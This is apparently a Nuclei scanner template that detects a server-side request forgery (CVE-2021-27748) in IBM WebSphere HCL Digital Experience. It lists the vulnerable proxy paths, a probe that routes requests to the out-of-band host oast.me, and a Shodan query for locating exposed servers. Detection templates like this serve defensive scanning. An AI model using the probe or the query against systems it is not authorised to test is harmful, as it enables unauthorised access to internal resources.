id: CVE-2021-27748 info: name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery author: pdteam severity: high description: | IBM WebSphere HCL Digital Experience is vulnerable to server-side request forgery that impacts on-premise deployments and containers. impact: | Successful exploitation of this vulnerability could allow an attacker to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Apply the latest security patches or updates provided by IBM to mitigate this vulnerability. reference: - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748 classification: cve-id: CVE-2021-27748 metadata: verified: true max-request: 2 shodan-query: http.html:"IBM WebSphere Portal" tags: cve2021,cve,hcl,ibm,ssrf,websphere http: - method: GET path: - '{{BaseURL}}/docpicker/internal_proxy/http/oast.me' - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me' host-redirects: true max-redirects: 2 stop-at-first-match: true matchers-condition: and matchers: - type: word words: - "Interactsh Server" - type: status status: - 200 # digest: 4b0a00483046022100b6134f89233da535e75fb3d2abac8b55797ec0997bc234ba4559b250efcc3489022100c2cce298030c3efdccc4e809925e7d77d72aab31f1de74f9c86ab5ae022b0a1e:922c64590222798bb761d5b6d8e72950